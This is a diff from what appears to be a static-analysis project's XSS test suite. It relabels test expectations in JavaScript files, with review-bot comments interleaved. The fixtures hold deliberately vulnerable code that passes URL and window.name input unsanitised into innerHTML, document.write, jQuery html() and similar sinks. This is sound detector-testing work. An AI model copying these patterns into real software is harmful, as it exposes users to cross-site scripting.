$ Alert */ } } function MyElement(props) { const provide = props.provide; - return
    ; // NOT OK + return
    ; // $ Alert } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,10 +3,9 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js index 75137f7de5ce..61a272dffe1a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js @@ -1,3 +1,3 @@ export function createHtml(x) { - return x; + return x; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js 
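Review bot: `return x; // $ Alert` in `createHtml` is the only annotation in trusted-types-lib.js, and the source it depends on is in a different file. From the trusted-types.js hunk the flow appears to start at `policy4.createHTML(window.name); // $ Source`, where `createHTML` is bound to `lib.createHtml`. A trailing note such as `// $ Alert - reached from policy4 in trusted-types.js` would let the expectation be read without opening the other file.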
@@ -1,13 +1,13 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK -policy1.createHTML(window.name); +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert +policy1.createHTML(window.name); // $ Source -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..a92e6e954909 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,172 +1,156 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
    '); + $('
    '); // $ Alert - $('
    '); // OK - $('
    '); // OK + $('
    '); + $('
    '); - let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + let params = (new URL(document.location)).searchParams; // $ Source + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
    " + s + "
    "; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - $sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, 
document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
    ').html(document.location.search); // NOT OK - angular.element('
    ').html('SAFE'); // OK + angular.element('
    ').html(document.location.search); // $ Alert + angular.element('
    ').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ - return function(v){ $("
    ").html(v); } // NOT OK + return function(v){ $("
    ").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
    ").html(xssSourceService()); // NOT OK + $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
    ").html(v); } // OK + return function(v){ $("
    ").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
    ").html(innocentSourceService()); // OK + $("
    ").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -174,30 +158,30 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { 
@@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -248,7 +232,7 @@ function react(){ } render() { - return ; + return ; // $ Alert } } 
@@ -256,36 +240,36 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } 
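Review bot: In `jqueryLocation()` the calls `$(location);` through `$(loc3);` lose their only marker when the bare `// OK` is dropped, so nothing on the new side says why they stay silent while `$("body").append(location); // $ Alert` a few lines later is flagged. Other lines in this commit keep a reason in the `// OK - …` form, and the same would help here, for example `$(location); // OK - argument is a Location object, not an HTML string` (presumably the reason; confirm against the jQuery model). The same applies to `$(name);` in `windowNameAssigned()` in this hunk, to `$(p);` in `flowThroughPropertyNames()` (@@ -293), to `target.replace(/<|>/g, '')` in `nonGlobalSanitizer()` (@@ -368) and to the `startsWith("https://")` branch of `urlStuff()` (@@ -450).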
@@ -293,74 +277,74 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search - $.jGrowl(target); // NOT OK + var target = document.location.search // $ Source + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. 
(this is a jQuery object) + var target = document.location.search // $ Source + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - this is a DOM-node + this.html(target); // OK - this is a DOM-node - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; 
@@ -368,81 +352,80 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); } function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); - target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + target.taint3 = document.location.search; // $ Source + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { - var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + var payload = window.location.hash.substr(1); // $ Source + document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - 
document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source - new Element("div"); // OK - new Element("div", {text: source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } 
@@ -450,63 +433,63 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // 
OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); } function nonGlobalSanitizer() { - var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + var target = document.location.search // $ Source + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js 
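Review bot: The expectation `$("#foo").html(ansiToHtml.toHtml(source)); // $ Alert` in `ansiToHTML()` puts a conversion step between source and sink, but the line does not say why that step is not treated as a sanitizer. The converter is created as `new Convert()` with no options, and ansi-to-html only entity-encodes markup when its `escapeXML` option is set. A trailing reason such as `// $ Alert - toHtml() does not escape HTML unless escapeXML is enabled` would record that for the next reader. Whether the library model distinguishes a converter built with `escapeXML: true` is not visible from this hunk.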
@@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,12 +17,12 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..866636f07c18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js 
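Review bot: `foo.setAttributeNS('foobar', 'href', data.p); // $ Alert` expects an alert for an arbitrary namespace while `foo.setAttributeNS('baz', 'width', data.w);` expects none, so the result apparently depends on the attribute name alone, and the line does not say so. A reason could be attached in the form this commit already uses elsewhere, e.g. `// $ Alert - the namespace argument is not checked, only the attribute name`. Likewise `foo.setAttribute("HREF", data.p); // $ Alert` seems to pin case-insensitive matching of the attribute name and could say so. The script continues past the hunk at `for (var p in data)`.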
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { - let tainted = document.location.search; + let tainted = document.location.search; // $ Source - $("
    " + tainted + "
    "); // NOT OK - $(`
    ${tainted}
    `); // NOT OK - $("
    ".concat(tainted).concat("
    ")); // NOT OK - $(["
    ", tainted, "
    "].join()); // NOT OK + $("
    " + tainted + "
    "); // $ Alert + $(`
    ${tainted}
    `); // $ Alert + $("
    ".concat(tainted).concat("
    ")); // $ Alert + $(["
    ", tainted, "
    "].join()); // $ Alert - $("
    "); // NOT OK - $(`
    `); // NOT OK - $("
    ")); // NOT OK - $(["
    "].join()); // NOT OK + $("
    "); // $ Alert + $(`
    `); // $ Alert + $("
    ")); // $ Alert + $(["
    "].join()); // $ Alert function indirection1(attrs) { return '
    ' + content + '
    '; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
    '.concat(content)).concat('
    '); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js index 59f9866daac0..5d2b25bed092 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/winjs.js @@ -1,5 +1,5 @@ function test(elt) { - var tainted = document.location.search.substring(1); - WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); - WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); + var tainted = document.location.search.substring(1); // $ Source + WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert + WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644 index ec505e62e171..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected index a862c47907c3..350f7bf5431c 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.expected 
@@ -1,3 +1,97 @@ +#select +| ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:11:18:11:33 | ajv.errorsText() | JSON schema validation error | +| ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:24:18:24:26 | val.error | JSON schema validation error | +| exception-xss.js:11:18:11:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:11:18:11:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:17:18:17:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:17:18:17:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:23:18:23:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:23:18:23:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:35:18:35:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:35:18:35:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:48:18:48:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:48:18:48:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:83:18:83:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:83:18:83:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. 
| exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:91:18:91:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:91:18:91:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:97:18:97:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:97:18:97:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:107:18:107:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:107:18:107:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | +| exception-xss.js:119:12:119:28 | "Exception: " + e | exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:119:12:119:28 | "Exception: " + e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:117:11:117:23 | req.params.id | Exception text | +| exception-xss.js:130:18:130:18 | e | exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:130:18:130:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:125:45:125:68 | documen ... .search | Exception text | +| exception-xss.js:138:19:138:23 | error | exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:138:19:138:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:136:10:136:22 | req.params.id | Exception text | +| exception-xss.js:149:18:149:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:149:18:149:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... 
